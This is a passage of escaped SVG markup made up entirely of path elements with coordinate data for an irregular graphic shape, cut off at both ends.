d=\"M382.1,92c1.8.6.3.8,1.4,1.6,3,.2,7.5.6,7,0-1.6-.1-5.3-.3-6.2-.7,3.6-.3,3-1.2,1.2-1.8-2.2.2.3.1.4.4h-4.1c-3-.5-4.1-1.1-8.5-1.7-.1-.6,7.4-.1,7.6-.8-8.7-.3-7.1-.8-6.9-1.5,1.4,0,2.9.1,4.3.1-4-.5,1.6-.6-5.4-1.3h4.2c4,.3,7,2.2.1,1.7,5.1.9,9.1,1.5,4.8,2.3,2.5,0,5,.4,5.7.1-2.5-.5-3.2-1.1.1-1.4-7.8-.4-5-1.3.1-1.4,0,.3.2.5,3.3.6,4.2-.5,5.8-.7-1.3-1.4-1,.3,5,.9.9,1-2.1-.1-3.6-.3-4.5-.4,3.2-.2,1.8-.3.7-.7,6.2.2,3.5-.3,6.6-.4-3.1-.3-5.9.1-7.3-.4,1.3-.4-3.9-.9,1.8-1.2,2.3.2,2.9.5,6.2.7.4-.4-5.3-.4-4.9-.8,3.8.1,3.5-.2,3.9-.3-5.2-.7-1.8-1.5-8.8-2.2,2.6-.1,1.5-.5,3.6-.6-.2.2.7.4,3.2.5-5.6-.8,1.1-1.6-8.4-1.7-1-.5,7.9-.5,3.3-1-.3.1.1.2-1.2.2.1-.2-1.8-.3-1.8-.5,6.1,0-2.4-1.2,4.4-1.3-5.8,0-3-.5-6.2-.7-2.9.6-4.4,1.4-6.6,2-3.2-.8-2.7-1.2-3.2-2,2.4,0,6.1.8,5.8.2-9.1-.6.1-1.1-5.7-1.8-1.2.5.7,1.2-7.4,1,7.1.2-.9.4-.9.5,8.4.3,1.9,1,5.6,1.7-6-.1-2.8.2-.7.7-7-.3-4.2.3-8,.4,14.9,1,2.7,2-.3,2.3,1,0,4.1.3,5.5.4-.2.3-10,.1-5.1.5,1.4-.1.1-.4,3.9-.2.5.4,1.4.8-2,.8,2.2.1,4.6.3,4.6.5a13.78,13.78,0,0,1-4.7.4c1.2.1-1.7.7,1.3.5,9.1-1,8.4,2.6-2.4,2,1.1.3,6.1.4,6.3.8-3.4.1-3,.6-7.8.6.5.6,5,1.1-.2,1.3a54.5,54.5,0,0,0,7,0c1.7.3,4.8.7.7.8a27.48,27.48,0,0,0-7.3-.4c3.7.3.7,1.2-.3,1.2,1.5.4,4.5,0,7.1.2.9.3,4.1.5,6.3.8-1.3.1-2,.3-3.9.4-2.5-.2-3.5-.6-6.3-.8,3.1.5-2.2.5.9,1,3.4.2,5.1-.2,5.7.1-.6.5-3.9.5-2,.9,1.9,0,3.8.1,5.7.1.5-.5,0-.7.4-1.1,2.1,0,5.3.2,5.6,0C374.7,92.8,373.4,91.8,382.1,92Z\"></path>\n        <path d=\"M359.9,82.1h-.3a.19.19,0,0,0,.27,0h0Z\"></path>\n        <path d=\"M492,95.4c2.4,0,3.8.2,4.3.1-3.2-.1-.3-.6-4.7-.7C491.7,95.1,491.9,95.2,492,95.4Z\"></path>\n        <path d=\"M204.4,85.9a25.51,25.51,0,0,1-4.1,0c1.7.5-2.1.1-2.6.3,1.7.1,3.3.2,4.5.3-3.6-.2-3.2.5-.7.7-1.1-.3.2-.4,4-.2.7.5,1.6.5.8.9,5.9.1,2.8.7,7.7.8-5.6-.7-.2-1.4-11.5-2C200.6,86.3,209,86.3,204.4,85.9Z\"></path>\n        <path d=\"M392.2,89.3c-7,.2,5,1.2,0,1.5-4.8-.2,3.4-.3-3.1-.4,1,.2-1.1.6,2,.7C401.2,90.9,390.6,89.7,392.2,89.3Z\"></path>\n        <path d=\"M327.2,89.6c1.9,0,3.8.1,5.7.1C334.1,88.7,332.4,89.5,327.2,89.6Z\"></path>\n        <path d=\"M408.2,90.1c-1.8,0-7.3,1.1-1.9,1C403.4,90.8,409,90.5,408.2,90.1Z\"></path>\n        <path d=\"M442.5,89.7c.4.5-8.9,2.1,1.6,1.8C445.8,90.9,447.1,90.6,442.5,89.7Z\"></path>\n        <path d=\"M213.8,83.9c-7.4-.2-8.4-1.8-3.3-2.1,1.2.5.7.8,2.3,1-.1-.2,3.9,0,4.1-.1-.5-.2-1.3-.8-4.8-.8,4-.1.7-.5,2.1-.7-4.2,0-7.7-.5-4.6-.5a4,4,0,0,0,1.6.3c8.4-.9-5.6-2.6,5.4-3.4-2.1-.3-6.9-.1-7.2-.3,7.5-.3-3.4-1.6,5-2.2-1.7-.1-4-.1-4.4-.2,3.8,0,1.9-1.1-1-1.1,1.1-.4,4.7-.7,10.9-.3-6.1-.6,2.2-.5-.8-.9-2,.5-4.2-.4-8.8-.5-.5.6-1.6.7,2.4,1.1-9.9.9-2,2.7-5,3.8-3.5-.1-4.2.1-7.1-.2,3.9.5,6.1,1.2,2.7,1.5,4,.1,4.3.4,4.8.7-1.8,0-2.1-.2-4.4-.2.1.2.9.3,1.7.4a27.48,27.48,0,0,1-3-.2c2.3.4-3.4.5.6.7.6-.1,1.3-.2,2.6-.3-.1.2,1.8.3,1.8.5-5.5-.3-2.4.2-6.9.1,4.2.5,4.7.7,2.4,1.1a30.64,30.64,0,0,1,5.9.3c-6.8-.5-5.2.6-2,.9-1.9,0-3.2-.1-4.4-.2,1.7.8,1.5,1.4-2.5,1.9,6.3.1,4.7.8,3.7,1.1-1.7-.1-3.3-.2-4.4-.3,4.1.3,3.5-.4,1-.4,1.4.6-4.4.3-6.6.4a123.68,123.68,0,0,0,14.4.5c-.6-.3-3.8-1.4,1.9-1.1-4,0,2.3.2,1.7.4-.7.5.6.5-.7.9a32.42,32.42,0,0,1,4.4.3c0-.2,4.6,0,4-.2C211,85.4,220.4,84.6,213.8,83.9Z\"></path>\n        <path d=\"M438.3,89.6c-.4-.4-5.4-.5-7.7-.8C426.5,88.3,433.2,89.6,438.3,89.6Z\"></path>\n        <path d=\"M307.7,86.4c1.9,0,5.6.5,5.8.2-5-.5-.6-.9,3-1.4-3.5-.1-2.9.1-7,0,3.2-.1,2.1-.6-2.1-.8C308.2,85.2,310.1,85.7,307.7,86.4Z\"></path>\n        <path d=\"M175.7,80.1c-8.4-.3,2.3-.3-4.7-.7.6.2-1.7.2-2.5.3,7.9.4-1.4,1.1,4.1,1.5C171.9,80.7,172.1,80.3,175.7,80.1Z\"></path>\n        <path d=\"M178.7,80.4c.2.4-4.9-.3-4.1,0,1.3.1.5.3,2,.7,1.9,0,3.8.1,5.7.1C181.7,80.9,182.8,80.5,178.7,80.4Z\"></path>\n        <path d=\"M322.1,83.9c.5-.3,2.4.2,4.4.2,1.1-.4-5-.3-6.1-.6-.6-.3,7.3-.3,2.2-.6.7.3-4,0-4,.2C321.9,83.3,316.9,83.6,322.1,83.9Z\"></path>\n        <path d=\"M480.2,86.8c4.4.2,2.5-.2,6.9-.1l-.3-.3C483.1,86.4,482.9,86.7,480.2,86.8Z\"></path>\n        <path d=\"M328.7,81.8c-.3-.6,1.7-1.2-2.9-1.7,4.1.2,3.5-.1,7,0,.1-.2-1.8-.3-1.8-.5-7.9,0-7.7.2-13.9,0-.1.5,3.1.7-.6.9,10.1.3.8,1.2,4.1,1.5,3.5-.1-.2-.9,6.3-.7C330.5,81.6,324.6,81.6,328.7,81.8Z\"></path>\n        <path d=\"M180.8,76.4c-1.5-.4,1.3-.5.6-.9-6.1,0,1.9-.6-3.5-.8C174.3,75.1,177.2,75.9,180.8,76.4Z\"></path>\n        <path d=\"M317.6,75.6c-4.8-.1-1.9.4-3.7.6,1.5.3,4.6.4,4.9.8-5.9.1-.8.7-4.7,1,3.1,0,4.6.2,4.6.4a24.32,24.32,0,0,1-2.7,0c-.1-.2-1.3-.3-3.1-.4,1.4.5-.1.7-3.5.8,4.9-.1,1.2.4,4.5.4,3-.1-2.1-.9,5.1-.5-.3.1-1.8.2-1,.4,6.1.2,7.1.1,11.5.5,1.1-.5-5.1-.5-4.9-.9,5,.2,7.5.6,8.4.1-5.6-.1-8.6-.4-9.1-.9,6.8.4,1.9-.7,3.4-.9,3.6.1,4.6.3,5.6,0-3.7,0,.8-.6-4.6-.5-1.2.2,4.6.5.4.4-5.4-.6-3.9-1.5-2.9-1.7-9.2-.5-4.7,1.1-4.2,1.5a23.82,23.82,0,0,1-2.8-.1c.9-.3-2.5-.4-3.3-.6C315.7,75.9,318.1,75.9,317.6,75.6Z\"></path>\n        <path d=\"M125.9,72.3c5.2,0,3,.4,7.3.4,1.9-.1-1.1-.8-3.1-.4-.5-.2,6.5-.6-.7-.8,2.1.6-2.2.8-5.3.3-3.9,0,3,1.1-3.4.9,4.4.4,3.3.6,5,1C130.1,73.5,121.2,72.6,125.9,72.3Z\"></path>\n        <path d=\"M277.7,74.5c-2.1.2-9.2-.1-6.9.1,7.5.2,3.2,1,7.8.9C277.5,75.2,277,74.8,277.7,74.5Z\"></path>\n        <path d=\"M123.3,69.5c-5.4,0-14.7-.4-18.3-.3,7.2.2,7.8.9,13.6,1.2C114.9,69.7,119.3,69.6,123.3,69.5Z\"></path>\n        <path d=\"M314.7,72.3c-2.7.4,2.4,1.2-1.5,1.4,9.5.2,4.8.5,7.9,1,2.7.1,3-.1,5.6,0a5,5,0,0,1-.6-.7c-5.7-.2-2.4-.8-2.2-.9,1.9.1,2.9.2,5.8.2.3-.3-2.8-.3-1.9-.6-4.7-.2-.8.3-5.5.1.9-.3-2.2-.3-1.9-.6,7.9-.2,6.8-1.1,4.1-1.7C315.3,70.8,321.9,73.3,314.7,72.3Z\"></path>\n        <path d=\"M330.1,69.3c-.4.2-.1.5-3.9.3-3.2-1.2,2.4-1.7,7.2-2.9,5.5.3-1.8.8.8.9a21.29,21.29,0,0,1,4.3.1c-1.2-.6,1.8-.8-2.5-1.3-.1.1-.2.3-2.6.2-2-.4.6-.5-2-.7-6.5.1-7.7-.4-7.1-.8a23.81,23.81,0,0,1-4.7.1c1.8-.3-.8-.4.8-.6,2.6.1,4.1.3,3.9.5a9.45,9.45,0,0,1,2.8-.8c1.2-.4-3.8-.4-3.4-.7,5.4.1,7.3-.3,5-.7-6.9-.3-1.4.6-6.5.5-1.3-.5,5-.5.5-1a40.91,40.91,0,0,0,7,0c-4.2-1-.7-1.4-4.7-2.2,2.8.1,2.1.3,5.9.4-3.2-1.6-.5-3.1-5.5-4.7,5.1.2.8-.7,5.3-.4-5.9-.6,2.4-1-4.4-1.8,0,.1-1.7,0-1.5-.1,3.8,0,3,.3,5.9.4-1-.2,1.1-.6-2-.7,0,.1-.2.3-2.6.2-.3-.8,2.5-1.3,5.4-1.7,2.1.4,1.5.5-.8.6,2.7.1,3-.1,5.6,0-4.3-1.1-12.6-1.6-12.2-2.8-5.7-.3-3.1.2-6.8.2.3.3,4,.5,4.8.8-6,.6.6,2.1,1.1,2.9a36.35,36.35,0,0,0-5.9-.3c-.1.3,3,.4,4.7.7-7.2,0,.3,1.3-5.7,1.4.2-.4-8.6-.7-7.1-.2,10.6,0,10.4,2,10.6,2.5,3.6.1-.6.9,3.8,1.2-1.2.1-5.2-.1-4,.2,4.7,0,4.8.9,8.1,1.3-1.8,0-1.8.1-4.2,0,0-.3-.4-.6-4.7-.7,3.6.5,1.6,1.1.3,1.7a22.65,22.65,0,0,0-6.2-.5c4.1.2,0,.5.6.7,1.7,0,3.5.1,5.2.1-.6.3-.6.7,1.3.9-4.4-.2-2.8-.1-7.1-.2.2.3,2.7.4,2,.7-5.3-.2-6.1,0-5.2.4,3.4-.1,2.6-.2,8.1-.3.6.2,2.3.5.6.7-6.6-.6-.7.2-7.1-.2-1.3.5-3.8.9-5.7,1.4,5.4.2.5-.6,6.7-.3a4,4,0,0,1,.6.7c-3.3-.1-5.3-.1-5.5.1,13.5.2,2.9,2,13.6,2.8-2.2-.1-3.7-.2-5.9-.4.6.2-1.7.2-2.5.3,2.1.3,4.1-.1,5.8.2.6.5-.5.3-2.7,0-.7.4,7,.4,6.2.8-9-.3,1.2.6-5.1.5,6,.4.1.5.9,1,6.1.3-.3-.6,3.8-.5.2.1,2.6.2,3,.3,3.5,0,7.9,0,9.5-.2-9.3-.2,1.1-.3-3.4-.7a13.45,13.45,0,0,0,4.2,0C331.5,69.7,332.8,69.4,330.1,69.3Z\"></path>\n        <path d=\"M330.6,65.1c.6-.1-2.2-.6.9-.5,1.5,0,3.6,0,1.3-.1-1.9,0-3.8-.1-5.7-.1C329.5,64.6,325.9,64.8,330.6,65.1Z\"></path>\n        <path d=\"M330.6,55.6c.4,0,.9.1,1.4.1C331.5,55.7,331,55.6,330.6,55.6Z\"></path>\n        <path d=\"M334.3,70.9c-1.1.3-2.9-.2-4.3-.2a10.17,10.17,0,0,1-2.7,0c0,.5,5.6.3,6,.5-4.2,0-3.8.5-4.8.9C332.7,72,335.1,71.2,334.3,70.9Z\"></path>\n        <path d=\"M100.6,68.9c-4,.2,5,1.1,3.5.8C101.7,69.3,105.1,69.2,100.6,68.9Z\"></path>\n        <path d=\"M250.8,72.3c-1,.3,6.7,1,6.1.6C251,72.9,256.6,72.3,250.8,72.3Z\"></path>\n        <path d=\"M241.5,72.8c4.4.2,2.5-.2,6.9-.1-.9-.2,1.2-.5-1.9-.6C248.8,72.7,241.7,72.4,241.5,72.8Z\"></path>\n        <path d=\"M150.4,70.4c-2.5.6,13.8.6,7.1.2C157.5,71.1,153.1,70.4,150.4,70.4Z\"></path>\n        <path d=\"M128.7,69.2c-.9.1-3.5.7-.9.5.1-.4,5.5.4,5.6,0a26.2,26.2,0,0,1-2.8-.1C130.1,69.6,130.7,69.3,128.7,69.2Z\"></path>\n        <path d=\"M136.2,68.3c5.7.2-.1.3.6.7,4.6,0,4-.6,10.8-.4-2.8-.1-2.1-.3-5.9-.4.4.2-1.2.2-4.1.1A6.55,6.55,0,0,0,136.2,68.3Z\"></path>\n        <path d=\"M151.8,65.6c-1.2.3,3.1.2,3.4.4.3-.1.6-.1.9-.2C154.2,65.8,153,65.7,151.8,65.6Z\"></path>\n        <path d=\"M154.8,66.1c-2.7-.1-2.9-.4-5.7-.5-.9.4,4.7.8-.8.7-4.7-.5,2.5-1-3.9-1.3-3.6.5-1.6.3-.3,1.2,7.5.3,4.6.5,12.1,1.1C152.9,66.8,153.1,66.5,154.8,66.1Z\"></path>\n        <path d=\"M155.2,66c-.2,0-.3.1-.4.1a.79.79,0,0,0,.4-.1C155.2,66.1,155.3,66,155.2,66Z\"></path>\n        <path d=\"M337,70.8c4.1.4.7.5,3.5.8C343.3,71.4,340.9,70.9,337,70.8Z\"></path>\n        <path d=\"M504.7,75.1C513,74.8,500.8,73.7,504.7,75.1Z\"></path>\n        <path d=\"M111.9,64.4c3.7.6,5,1.3,11.2,1.7C117.3,65.5,118.7,64.6,111.9,64.4Z\"></path>\n        <path d=\"M478.4,72.1c-.9.6,2.7,1.4,6.9,1.6C481.2,73.3,483.5,72.5,478.4,72.1Z\"></path>\n        <path d=\"M142.5,62.8c-.8-.1-1.7-.3-3.1-.4-4,.2,2.4.5,4.7.7.8,1-2.8,1.1,1.7,1.9.9-.2,5.5.4,7.5.6,1.3-.6-9-1.2-1.3-1.4a22.48,22.48,0,0,0,5.9.4c-1.8-.2-3.8-.4-6.1-.6-1.4-.5,1.9-.6,3.5-.8-2.1-.1-5.2-.1-5.8-.2-.1-.2,9,0,3.9-.3-2.4.2-4.8-.6-9-.7,2.6.5-3.5.1-3.9.4,5.5.2-.1.4,4.8.7A7.34,7.34,0,0,0,142.5,62.8Z\"></path>\n        <path d=\"M401,70.9c4.1,0,4.3,0,8.5.2,1.6-.5-8.2-.3-7.6-.7.8,0,1.5-.1-.1-.1C397,70.4,403.4,70.7,401,70.9Z\"></path>\n        <path d=\"M250.3,67c3.4.1,1.8.5,4.7.7.9-.4-3.3-.8,1.8-1.2C252.5,66.4,253.3,66.9,250.3,67Z\"></path>\n        <path d=\"M115.9,64.2c.3-.4-1.2-.7-4.9-.9,2.2.4,4.2.5.6.7C113.5,64,114.7,64.1,115.9,64.2Z\"></path>\n        <path d=\"M102.2,62.9c-2.5.1.9.3,1.9.6-1,.1-8.3.1-3.9.3a19.39,19.39,0,0,1,4.1-.1c1.3-.1,1-.4,2.3-.5A36,36,0,0,1,102.2,62.9Z\"></path>\n        <path d=\"M414.4,70.3c-4.4-.2-5.1,0-8.4-.1.4-.2,2.7-.5-2-.7-1.8.1-.4.5-2.2.6,6,0,3.4.5,8.8.5C408.1,70.2,416.9,70.8,414.4,70.3Z\"></path>\n        <path d=\"M444.3,71.2c3.5-.1,2.2-.8.6-.9a15.43,15.43,0,0,1-2.8-.1C445.8,70.7,440.7,70.9,444.3,71.2Z\"></path>\n        <path d=\"M279.2,66.6c3.2-.3,5.2.4,7.4.5.7-.6-2.5-1.1.2-1.3C284.1,66,274.1,66,279.2,66.6Z\"></path>\n        <path d=\"M212.2,64.8a17.8,17.8,0,0,1-3-.2,26.15,26.15,0,0,0,2.8,0c-1.4,0-2.8-.1-4.2-.1,1.5.2,1,.6,3.4.7C210.7,65,212.6,65,212.2,64.8Z\"></path>\n        <path d=\"M113,62.5c-.5.2,3,.8,4.7.5-2.5-.1-3.4-.3-3.2-.5,1.9,0,3.2.1,4.4.2C118.2,62.2,115.3,62.4,113,62.5Z\"></path>\n        <path d=\"M45.6,60.2c4.9-.1,1.2.4,4.6.4-1.8-.5.5-1.3-4.3-1.7C47.3,59.4,47.9,59.8,45.6,60.2Z\"></path>\n        <path d=\"M133.7,60.7c-9.2-.3-9.2-.5-17.4-.8-1.9,0,.2.4-2.5.4-2.4-.2,1.9-.7-4.9-.9,4.7,1.1,1,1.7,4.8,2.3,0-.2,5.4.2,7.2.3-.5-.6,6.3-.6.3-1.2,5.2,0,10.4-.2,12.8.4a20.27,20.27,0,0,0-2.7,0c2.1,0,5.3.2,5.6,0C134.4,61.2,133.5,61,133.7,60.7Z\"></path>\n        <path d=\"M353.4,65.7c3.7.1,6.1.2,6,.5-.9-.1-5.7-.4-5.7-.1a33.79,33.79,0,0,1,4.5.3c0-.3,6.6,0,5.2-.4A79.44,79.44,0,0,0,353.4,65.7Z\"></path>\n        <path d=\"M149.1,61c7.9-.3-.5-.7-2.7-1.5,5.7-.3-.1-.6,3.4-.9a33.9,33.9,0,0,1-4.5-.3c0,.1-.2.3-2.6.2,1.1.3,3.4.6-2.4.5,1.9-.5-1.7.1-7.1-.2.4.2-.2.4,1.8.5,0-.7,3.5.7,5.8.2-3.6-.1-.4-.4,2.5-.3.3.6-5.3.6-6,1.1,7.6.2,6.9.9,3.7,1.1,3.1.3,2.7,0,5.8.2.4-.6,10.4-.2,13.4-.6C155.9,60.9,150.9,61.2,149.1,61Z\"></path>\n        <path d=\"M333.5,65.2c1.1.1,2.8.1,2.9.2-1.8,0-2.8.1-2.5.3,3.8.1,12,0,5.3-.3-.2.4-3.7.1-1.5-.1A34.6,34.6,0,0,0,333.5,65.2Z\"></path>\n        <path d=\"M252.7,63.7c-.6-.5,6.1-.3,6.6-.7-2.3-.3-3.3.1-4.4-.2-1.6-.5,4.4-.6,1.9-1a15.43,15.43,0,0,1-2.8-.1C255.1,62.4,251.8,63.2,252.7,63.7Z\"></path>\n        <path d=\"M252.7,63.7c.1.1.2.1.4.2C252.9,63.8,252.8,63.7,252.7,63.7Z\"></path>\n        <path d=\"M60.3,59.4c-1.9-.6.6-.7-2.4-1.1C58.8,58.8,52.7,59,60.3,59.4Z\"></path>\n        <path d=\"M48.1,58.3c3.4.1,3.5.4,6.1.6-3.1-.5,6.1-.4.7-.7-.6.1-1.3.2-2.5.3A16.74,16.74,0,0,0,48.1,58.3Z\"></path>\n        <path d=\"M343.9,64.4a40.66,40.66,0,0,0-8.1.3c3.4.1,3.5.4,6.1.6a17.85,17.85,0,0,0-3.4-.7C340.9,64.5,345.6,64.7,343.9,64.4Z\"></path>\n        <path d=\"M135.7,59.9c-1.7-.1-1.7-.2-1.7-.4-6,0-4.2-.5-8.9-.6C126,59.3,134.1,59.9,135.7,59.9Z\"></path>\n        <path d=\"M365,64.7c.5-.2-4.3-.7-4.6-.4,3.2.1.4.6,4.7.7-.1-.3,5.4,0,5.3-.3a21.62,21.62,0,0,1-3-.3C368.1,64.6,367.5,64.8,365,64.7Z\"></path>\n        <path d=\"M357.6,64.1a79.55,79.55,0,0,1-10-.3c-.9.4-.2.5,3.5.8a29.54,29.54,0,0,1,5.4-.2c.1.1,1.3.2,1.4,0C355.4,64.4,358,64.3,357.6,64.1Z\"></path>\n        <path d=\"M79.6,57.7c.3.4,6.4.6,7.8.9C87.3,58.1,82.7,57.9,79.6,57.7Z\"></path>\n        <path d=\"M70.6,55.4c-1.8-.1-3.4-.1-3-.3-1.2.2-2.1,1-1.6,1.4a8.16,8.16,0,0,1,2.7,0c-.8.4-3.7.5-4.8.9,1.9.3.9.7,4.9.9C69.6,57,72.3,56.5,70.6,55.4Z\"></path>\n        <path d=\"M0,56.3c1,.1,2.5-.1,0-.7Z\"></path>\n        <path d=\"M100.5,57.8c-2.5.2-.3.7,2.2.9C98.5,58.2,106.2,58.1,100.5,57.8Z\"></path>\n        <path d=\"M104.7,57.8l.2.2a6.8,6.8,0,0,1,1.5.1c4.7.2.8-.3,5.5-.1,1.9.2.8.7,3.5.8-1.9-.4,2-.2,2.4-.4-3.1-.1-1-.4-1.9-.6,4,.2,6.2.3,9.9.2-3.3-.5.2-1.1-2.3-1-2.3.2.2.8-6.5.5,1.1-.1,1.6-.3.9-.5-4.9,0-10.9.3-7.6.8C106.5,57.8,107.4,57.7,104.7,57.8Z\"></path>\n        <path d=\"M340.2,63.3c5.9.2-1.2.4,3.3.6-.2-.2,3.7-.1,2.5-.4C342.5,63.6,342,63,340.2,63.3Z\"></path>\n        <path d=\"M127.9,57.3c-3.1.2,1.8.8,3.7,1.1C133.7,58.2,128.9,57.7,127.9,57.3Z\"></path>\n        <path d=\"M337.8,62.2h-4.2c0-.1-1.3-.2-1.4,0,3.7.1,1.5.5,6,.5C340.3,62.4,337.9,62.5,337.8,62.2Z\"></path>\n        <path d=\"M292.9,60.2c-3.4.2-6.4.4-10.7.5,2,.2,5.3.2,7.3.4.2-.2-2.1-.3-3.1-.4C290.9,60.8,295.4,60.6,292.9,60.2Z\"></path>\n        <path d=\"M113.6,56.9c6,.1,2.9-.4.8-.6-3.4.1-6.2-.5-7.1-.2C112.3,56.3,115.6,56.6,113.6,56.9Z\"></path>\n        <path d=\"M88.3,51.7c-3.5,0-9.8.1-8.1.3,6.5-.3,8.6.6,8.7.4C89.9,52.4,91.5,51.9,88.3,51.7Z\"></path>\n        <path d=\"M335.9,56.9c3.4.5-1,.3-3.8.5,4.4,0,4.5.3,7.3.4C339.3,57.4,338.9,57.1,335.9,56.9Z\"></path>\n        <path d=\"M197.3,54.2c-2.3,0-.2-.4,1-.4-1.4.2,2.7.6,3,.3-3.2-.5-4.8-.3-8.9-.6C192.4,53.7,194.7,54.5,197.3,54.2Z\"></path>\n        <path d=\"M106,51.4c1.4.5-2,.6-4.9.8,9.2.2,6.5-.5,7.6-.8-3.5-.1-3.4-.5-8.8-.5C107.3,51.2,99.1,51.7,106,51.4Z\"></path>\n        <path d=\"M37.7,49.5c-3.1-.3,1-.5-2-.7.2.4-8.7.5-3.3,1C31.6,49.5,33.9,49.2,37.7,49.5Z\"></path>\n        <path d=\"M0,48.7H0c2.6.2,4.4.2,3.7.2C2.5,48.8,1.3,48.7,0,48.7Z\"></path>\n        <path d=\"M0,46.8a37.89,37.89,0,0,0,5.3.7A36.44,36.44,0,0,0,0,46.6Z\"></path>\n        <path d=\"M312.8,54.3c.8-.8-.2-1-4.2-1.6,1.3.5,1.6.5-.7.7C317.3,53.7,306.3,54.1,312.8,54.3Z\"></path>\n        <path d=\"M272.5,52.7c-1.9-.6,4-1.5-4.6-2.1C273.2,51.3,266.7,51.9,272.5,52.7Z\"></path>\n        <path d=\"M195.9,51a15.4,15.4,0,0,1,2.8.1c-.2-.2.8-.3,2.5-.3.1.1.3.1,1.5.1l-.2-.2a27.48,27.48,0,0,1-3-.2C201.7,51,190.3,50.6,195.9,51Z\"></path>\n        <path d=\"M357.8,51.8c1.1,0,1.7.1,1.6.3-2.5-.1-8.2,0-4,.2C358.7,52.4,363.6,51.7,357.8,51.8Z\"></path>\n        <path d=\"M340.4,51c4,.3-3.5.5.7.8l3.7-.6C341.1,51.3,341.6,50.6,340.4,51Z\"></path>\n        <path d=\"M292.6,50.3c0-.1.1-.1,1.3-.1.9,0,1.7,0,1.3-.1-1.7-.1-1.7-.2-1.7-.4,4.9.3,5.2.1,5.5-.1,3.1.2,8.5.2,7.5.6,5.6-.1,6.9-.6,10.4-.9-6.6-.1-5.6.5-12.2.4,1-.4-8-.2-7.5-.6-.4-.5,6,.1,5.3-.3-.5-.4-4.5.1-4.3-.2,4.5-.1-3.2-.3-1.9-.6.8,0,5.2-.2,5.7.1s-1.7.2-2.5.3c2.5,0,4.4.1,5.8.2-.6-.4.5-1.1-7-1.7-3.2.2,2.3.3,1.9.6-5.6.2-7.9,0-4.5-.4-5.8-.1-4.5.5-.7.7a20.82,20.82,0,0,0-4.1.1c1.7.1,4,.1,4.4.2.2.2-.8.3-2.5.3-2.3-.3-4.8-.5-7.6-.7-2.3.1,4.4.8,6.2.7,0,.3,2.5.4,3.3.6-5.3-.1,1.5.5-4.1.1C294.3,49.7,288.5,50,292.6,50.3Z\"></path>\n        <path d=\"M276.4,49.3c3.4-.1,7.9-.1,9.4-.3C281.2,49,277,49,276.4,49.3Z\"></path>\n        <path d=\"M339.8,50.3c1.2-.2-5.2-.6-5.9-.4,6.9.2-.1.3-1,.4C337.4,50.6,335.4,50.1,339.8,50.3Z\"></path>\n        <path d=\"M297.3,41.5c-1-.4-5.8-.9.4-1.1-7.9-.1-5.8-.8-9.4-1.2-7.5.2,8.4,1.2-.1,1.4a7.8,7.8,0,0,0-3-.3c-1.3.5,3.6,1.6-6.9,1.6,5.2.4,5.1.7-.7.7a114.26,114.26,0,0,0,13.6-.3c.3.2,4.8.2,4.5.4a32.67,32.67,0,0,0-3.8.5c2.5,0,4.4.1,5.8.2.9-.3-2.3-.3-1.9-.6,2.1.1,2.6.2,4.5.3.6-.4-3.4-.5-3.5-.8,2.7.1,4.8.2,5.9.3-2.5.6,10.4,1.4,5.7,1.8,5.7-.1,1.3-.7,3.4-.9-1-.2-6.7-.1-7.3-.4l-.3-.3a62.16,62.16,0,0,1,10.2.6c3-.2-4.4-.5-4.9-.9a16.86,16.86,0,0,1,5.3-.3c2.8.3,6.8.4,9,.7a61.84,61.84,0,0,1-7.2-.3c-.4.6,4.7.3,6.2.7.4.4-1.6.6-3.5.8,1.7.1,4,.1,4.4.2-6.7,1-1.8,2.8-9.1,3.8-1.7-.1-1.7-.2-1.7-.4-2.6,0-4.7,0-5.5.1,3.8.4,9.8.6,14.7.9.7.6-4.8-.1-5.3.3,3.6.3,7,.1,11.3.3-4.6-.5.2-.8-5.2-1.2-1.4.1-.1.4-4,.2a53.56,53.56,0,0,1,7.9-.5c-1.8-.5-2.2-1-1-1.1,2.7-.2,2.8.1,5.8.2.7-.4-7-.4-6.3-.8,2.6,0,4.7,0,5.5-.1-9.7-.1,6.2-.6-2.3-1-1.8.1-.2.5-3.8.5-1.1-.6,3.4-.8,6-1.1-1.7-.1-4-.1-4.3-.2,5.8-.3-1.3-1.1,2.5-1.9-6.6-.2-3-.4-3.4-.7-4.4-.2-4,.1-8.4-.1,2.7.5-.6.2-5.3.3-2.4-.8-9.2-1.2-14.1-1.8C297.4,40.6,302.3,41.3,297.3,41.5Z\"></path>\n        <path d=\"M333.6,49.5c1.7,0-1.4-.5,5.4-.2,0,.2.7.4,1.6.3-.1-.2-.9-.3-1.7-.4-4.5-.2-5.3.1-8.5-.2C330.8,49.2,329.4,49.5,333.6,49.5Z\"></path>\n        <path d=\"M367.4,48.5a78.32,78.32,0,0,0-8.1.3c.9.1,5.7.4,5.7.1C359.8,48.6,368.4,48.8,367.4,48.5Z\"></path>\n        <path d=\"M275.4,46.6c4.2.1,10.6-.1,8.1-.3-2.5,0-3.7.2-6.8.2-.3-.2-.1-.4-3.1-.4C273.4,46.3,275.4,46.4,275.4,46.6Z\"></path>\n        <path d=\"M302.7,46a24.32,24.32,0,0,1,2.7,0,4,4,0,0,0,1.6.3c-.1-.5,2.2-.9-5.1-1.1C304.7,45.5,302.5,45.9,302.7,46Z\"></path>\n        <path d=\"M284.4,44.2c-5-.1-4.1.3-6.6.4,2.4,0,3.8.2,4.3.1C277.9,44.4,286.3,44.5,284.4,44.2Z\"></path>\n        <path d=\"M364.1,44.8c-.4.3,2.8.3,1.9.6,7.1.2.5-.3,3.9-.4,3.2,0,1.9.4,4.5.4C375,44.8,366.4,45,364.1,44.8Z\"></path>\n        <path d=\"M14.4,32.6l.2.2c8.3.1,1.3.7,3.6,1,0-.1.1-.1,1.3-.1.3.1,0,.3,1.7.4,2-.4-1.8-.9-2.7-1.5Z\"></path>\n        <path d=\"M331.4,40.7c3.3.2,4.1-.4,7,0a20.27,20.27,0,0,0-2.7,0c9,0,1.7-.5,3.4-.9a61.71,61.71,0,0,0-6.8.2C338.5,40.4,332.5,40.6,331.4,40.7Z\"></path>\n        <path d=\"M275.3,38.6c5,.3-1,.6,6.2.8-.7-.3-3.2-.5-.6-.7C277.9,38.8,275.4,38.3,275.3,38.6Z\"></path>\n        <path d=\"M291.1,39.2c-.1-.1-.2-.3-.4-.4-2.1-.1-7.2,0-7.2-.3,1.2.1,2.7-.7-.8-.9-3,.3,2.4.9-2,.9C284.8,38.7,286.3,39,291.1,39.2Z\"></path>\n        <path d=\"M347,39.6c2.6-.2-1.3-.5,1.4-.7-3.9.2-6.5,0-7.2.4C343.2,39.4,344.1,39.5,347,39.6Z\"></path>\n        <path 